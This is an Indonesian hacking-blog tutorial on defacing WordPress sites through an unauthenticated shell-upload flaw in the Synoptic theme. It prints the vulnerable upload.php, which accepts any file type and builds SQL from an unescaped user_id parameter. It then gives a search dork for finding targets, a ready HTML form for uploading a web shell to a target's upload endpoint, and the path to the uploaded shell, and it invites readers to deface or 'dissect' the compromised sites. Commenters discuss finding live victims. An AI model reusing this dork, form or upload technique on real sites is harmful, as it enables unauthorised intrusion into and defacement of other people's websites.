Thursday, 12 January 2017

eXploit WordPress Themes Synoptic Shell Upload Vulnerability


Hello World ; Malamm Fans, Please Say Hello Haters ;*
xixixhihi, kali ini gua bakal Share salah satu Bug yang ada pada beberapa Themes di CMS WordPress
btw gua beloman ngucapin Selamat Tahun baru yoo utk sobat2 pembaca setia Blog TKJ Cyber Art >..< wkwkwk.
moga di tahun ini, yang jomblo bisa punya pacar ya :v , xixixhi dan maap kalo gua baru nonggol di blog sekarang >..<
karena sebelomnya, sudah di awali dengan 2 artikel dari Om OepilCore yang membawakan Tema Wifi Kungfu xD (buka perguruan dia xD kwkwkw), sekarang giliran gua bawain tema utk para Dispenser nih xD wkwkw.

sebenernye sih ini eXploit lawas *gak lawas2 amatsih*, kali aja msh crotz
yupz, Nue bakal Share Tutorial Deface dengan eXploit WordPress Themes Synoptic Shell Upload Vulnerability.
eXploit ini memanfaatkan Bug pada: 
/public_html/wp-content/themes/synoptic/lib/avatarupload/upload.php


<?php
//include required wp-load.php file for access WP functions
$wp_load_include = "../wp-load.php";
$i = 0;
while (!file_exists($wp_load_include) && $i++ < 9) {
 $wp_load_include = "../$wp_load_include";
}
//required to include wordpress file
require($wp_load_include);


/**
 * Handle file uploads via XMLHttpRequest
 */
class qqUploadedFileXhr {
    /**
     * Save the file to the specified path
     * @return boolean TRUE on success
     */
    function save($path) {    
        $input = fopen("php://input", "r");
        $temp = tmpfile();
        $realSize = stream_copy_to_stream($input, $temp);
        fclose($input);
        
        if ($realSize != $this->getSize()){            
            return false;
        }
        
        $target = fopen($path, "w");        
        fseek($temp, 0, SEEK_SET);
        stream_copy_to_stream($temp, $target);
        fclose($target);
        
        return true;
    }
    function getName() {
        return $_GET['qqfile'];
    }
    function getSize() {
        if (isset($_SERVER["CONTENT_LENGTH"])){
            return (int)$_SERVER["CONTENT_LENGTH"];            
        } else {
            throw new Exception('Getting content length is not supported.');
        }      
    }   
}

/**
 * Handle file uploads via regular form post (uses the $_FILES array)
 */
class qqUploadedFileForm {  
    /**
     * Save the file to the specified path
     * @return boolean TRUE on success
     */
    function save($path) {
        if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
            return false;
        }
        return true;
    }
    function getName() {
        return $_FILES['qqfile']['name'];
    }
    function getSize() {
        return $_FILES['qqfile']['size'];
    }
}

class qqFileUploader {
    private $allowedExtensions = array();
    private $sizeLimit = 10485760;
    private $file;

    function __construct(array $allowedExtensions = array(), $sizeLimit = 10485760){        
        $allowedExtensions = array_map("strtolower", $allowedExtensions);
            
        $this->allowedExtensions = $allowedExtensions;        
        $this->sizeLimit = $sizeLimit;
        
        $this->checkServerSettings();       

        if (isset($_GET['qqfile'])) {
            $this->file = new qqUploadedFileXhr();
        } elseif (isset($_FILES['qqfile'])) {
            $this->file = new qqUploadedFileForm();
        } else {
            $this->file = false; 
        }
    }
    
    private function checkServerSettings(){        
        $postSize = $this->toBytes(ini_get('post_max_size'));
        $uploadSize = $this->toBytes(ini_get('upload_max_filesize'));        
        
        if ($postSize < $this->sizeLimit || $uploadSize < $this->sizeLimit){
            $size = max(1, $this->sizeLimit / 1024 / 1024) . 'M';             
            //die("{'error':'increase post_max_size and upload_max_filesize to $size'}");    
        }        
    }
    
    private function toBytes($str){
        $val = trim($str);
        $last = strtolower($str[strlen($str)-1]);
        switch($last) {
            case 'g': $val *= 1024;
            case 'm': $val *= 1024;
            case 'k': $val *= 1024;        
        }
        return $val;
    }
    
    /**
     * Returns array('success'=>true) or array('error'=>'error message')
     */
    function handleUpload($uploadDirectory, $replaceOldFile = TRUE){
        if (!is_writable($uploadDirectory)){
            return array('error' => "Server error. Upload directory isn't writable.");
        }
        
        if (!$this->file){
            return array('error' => 'No files were uploaded.');
        }
        
        $size = $this->file->getSize();
        
        if ($size == 0) {
            return array('error' => 'File is empty');
        }
        
        if ($size > $this->sizeLimit) {
            return array('error' => 'File is too large');
        }
        
        $pathinfo = pathinfo($this->file->getName());
        //$filename = $pathinfo['filename'];
  $filename = $this->file->getName();//$pathinfo['filename'];
        //$filename = md5(uniqid());
        $ext = $pathinfo['extension'];

        if($this->allowedExtensions && !in_array(strtolower($ext), $this->allowedExtensions)){
            $these = implode(', ', $this->allowedExtensions);
            return array('error' => 'File has an invalid extension, it should be one of '. $these . '.');
        }
        
        if(!$replaceOldFile){
            /// don't overwrite previous files that were uploaded
            while (file_exists($uploadDirectory . $filename . '.' . $ext)) {
                $filename .= '_1';//rand(10, 99);
            }
        }
        
        //if ($this->file->save($uploadDirectory . $filename . '.' . $ext)){
  if ($this->file->save($uploadDirectory . $filename)){  
   global $wpdb;
   $table_name = $wpdb->prefix.'syn_users';
   /*$syn_posts_query = "UPDATE ".$table_name." SET market_file_name='".$filename . '.' . $ext."' 
              WHERE ID = ".$_GET['user_id']." AND post_status='publish';"; // update user profile info*/
              
   //$syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename.".".$ext."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
   $syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
   //$wpdb->show_errors();
   $wpdb->query($syn_avatar_query);
  
            //return array('success'=>true);
        } else {
            return array('error'=> 'Could not save uploaded file.' .
                'The upload was cancelled, or server error encountered');
        }
        
    }    
}

// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = array();
// max file size in bytes
$sizeLimit = 1 * 528 * 528; // is equal with 278KB

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);

//put permission to upload file
$stat = @stat( dirname( AVATAR_UPLOAD_FOLDER ) );
$dir_perms = $stat['mode'] & 0007777;  // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );

$result = $uploader->handleUpload(AVATAR_UPLOAD_FOLDER);

//put permission to not read folder from outside
$dir_perms = $stat['mode'] & 0005555;  // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );

// to pass data through iframe you will need to encode all html tags
echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);

?>

Let's Fight Ghost ;*


Dork:
inurl:/wp-content/themes/synoptic/

eXploit:
/wp-content/themes/synoptic/lib/avatarupload/upload.php

1. Dorking menggunakan Search Engine

2. Pilih target kalian, Lalu masukan eXploitnyee.
contoh: target.c0li/wp-content/themes/synoptic/lib/avatarupload/upload.php

3. Vulnerability ~ {"error":"No files were uploaded."}


awali eksekusi dengan beberapa sentuhan Nikotin, dan Pelukan Hangat Caffeine
Script CSRF Upload:

<form enctype="multipart/form-data"
action="target.c0li/wp-content/themes/synoptic/lib/avatarupload/upload.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="3xploi7ed !" />
</form>

*copy script diatas, lalu cantumkan url target yang mau lu tusb0l3d
*save dgn ekstensi .html

4. Buka Script yang tadi sudah di Save dgn browser kalian , Lalu silahkan Upload Shell Lu


5. Jika muncul notif atau tulisan seperti dibawah, shell anda sukses terupload
#CMIIW



6. Shell Akses: /wp-content/uploads/markets/avatars/shellLu.php
contoh: target.c0li/wp-content/uploads/markets/avatars/shellLu.php

Done, br0~
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini


Percuma jadi pencinta alam, kalo tidak dicintai Olehnya ~
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked~
Sekian dan semoga bermanfaat .. terimakasih

source and thanks to: 3xploi7 Bug


./Nuenomaru

selagi Hasrat dpt menghasilkan Hal2 dengan Hasil yang Positif xD



Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

6 comments

informasinya urusan hacking, dulu saya pernah diketawain waktu bergabung di group hacker gara-bgara saya gak ngerti sama sekali.

gile di google dorknya cuman ada 4 situs doang ,, 1 situs bug nya udh di tutup bang sisanya gk vuln ,, buat tutor ngembangin dork dong bang ..

keep fight om,, moga sukses ..
semua itu diawali dari bawah kok..
#Nuenomaru

xixixhi, install wordpress dengan themes diatas, lalu liat dir nya, implementasikan itu menjadi dork lu.
#Nuenomaru

awkakwkwa moga sukses
#Nuenomaru


EmoticonEmoticon